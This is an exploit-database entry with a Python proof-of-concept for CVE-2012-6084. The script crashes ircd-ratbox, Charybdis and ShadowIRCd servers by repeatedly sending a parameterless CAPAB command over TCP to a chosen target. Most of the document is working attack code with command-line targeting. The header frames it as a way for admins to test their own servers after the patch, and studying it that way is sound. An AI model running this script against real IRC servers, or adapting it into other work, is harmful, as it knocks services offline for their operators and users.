Ratbox IRCd Denial Of Service



EKU-ID: 2934 CVE: 2012-6084 OSVDB-ID:
Author: Apetrick Published: 2013-01-05 Verified: Verified


#!/usr/bin/python3
###################################################################################
#
#      _  _  .__                .__               
#   __| || |_|  |   ____   ____ |__| ____   ____  
#   \   __   /  | _/ __ \ / ___\|  |/  _ \ /    \ 
#    |  ||  ||  |_\  ___// /_/  >  (  <_> )   |  \        http://www.zempirians.com
#   /_  ~~  _\____/\___  >___  /|__|\____/|___|  /
#     |_||_|           \/_____/                \/
#
#   00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
#   Provided by: UberLame, Aph3x, Apetrick, O_O
#
###################################################################################
#
#             -=[ SHADOWIRCD 6.3.3 - Running vulnerable m_capab.c ] =-
#
#       [P]roof [o]f [C]oncept, Null Pointer Dereference, Denial of Service
#
#
###################################################################################
# -=[ EXPLOIT ]=-
#
# Now that a patch is available, we are releasing a proof of concept so that you can
# test your own ircd for this vulnerability. It was written against a ShadowIRCd
# 6.3.3 build that still contains the following vulnerable line:
#
#	+VULNERABLE+
#       ../shadowircd/modules/m_capab.c - LINE(40)
#	{{mr_capab, 0}, mg_ignore, mg_ignore, mg_ignore, mg_ignore, mg_ignore}
#
# -=[ SUMMARY ]=-
#
# All versions of Charybdis prior to the fixed release listed under PATCH below are
# vulnerable to a remotely triggered crash bug caused by code originating from
# ircd-ratbox 2.0.  (Incidentally, this means all ircd-ratbox versions from 2.0 up
# to its fixed release are also vulnerable.)
# 
# The bug has to do with server capability negotiation.  A malformed request will
# trigger a crash due to invalid assumptions.
#
# -=[ PATCH ]=-
#
# January 1, 2013 - 12:55 PM GMT-6
# 
# Charybdis 3.4.2, ShadowIRCd 6.3.3 and Ratbox 3.0.8 have been released with an
# integrated patch to resolve this issue.  All admins should upgrade immediately.
#
# -=[ REFERENCE ]=-
#
# http://www.cvedetails.com/cve/CVE-2012-6084/
#
###################################################################################
# Ohai, I Can Has Moar Cycles? <33
#
# Eg: ./<file>.py -t <target> -p <port>
###################################################################################

from argparse import ArgumentParser
import socket


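def own( uri, port ):
        """Connect to an IRC daemon and repeatedly send a parameterless CAPAB line.

        This is the CVE-2012-6084 check described in the file header.

        Args:
            uri: Host name or address of the IRC daemon.
            port: TCP port; anything int() accepts.

        Exits the process (status 0, as before) when the connection cannot be
        made. Otherwise returns None once a send on the connection fails.

        NOTE(review): the loop ends only when send() raises. Against a daemon
        that stays up and keeps the connection open it does not terminate on
        its own.
        """
        sock = socket.socket()
        try:
                try:
                        # connect_ex() reports most connection failures through its
                        # return value instead of raising. Without checking it, a
                        # refused connection was announced as "Connected" and the
                        # first failed send was then reported as a crash.
                        status = sock.connect_ex(( uri, int( port ) ))
                except ( OSError, OverflowError, TypeError, ValueError ):
                        # Name resolution errors and unusable port values still raise.
                        status = -1

                if status != 0:
                        print( "\t[-] Failed To Connect To {}".format( uri ) )
                        raise SystemExit

                print( "\t[+] Connected, Sending Payload To {}:{}".format(  uri, port ) )
                while True:
                        try:
                                # ASCII for "CAPAB \r\n": the command with no parameters.
                                sock.send(b"\x43\x41\x50\x41\x42\x20\x0d\x0a")
                        except socket.error:
                                # NOTE(review): a send error only shows that the connection
                                # broke. It does not by itself confirm that the daemon
                                # crashed; confirm on the server (process state, logs).
                                print( '\t[!] Owned <3' )
                                break
        finally:
                # Release the descriptor on every path, including the early exit.
                sock.close()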

if __name__ == '__main__':
        # Command-line front end: -t/--target (default localhost) and
        # -p/--port (default 6667).
        cli = ArgumentParser( description='m_capab DOS PoC, We Can Has Moar Cycles?' )
        cli.add_argument(
                '-t', '--target',
                dest='target',
                default='localhost',
                help='IRCD Address To Target',
        )
        cli.add_argument(
                '-p', '--port',
                dest='port',
                default=6667,
                help='IRCD Port To Target',
        )

        opts = cli.parse_args()

        # The port is handed over unconverted; own() applies int() to it.
        own( opts.target, opts.port )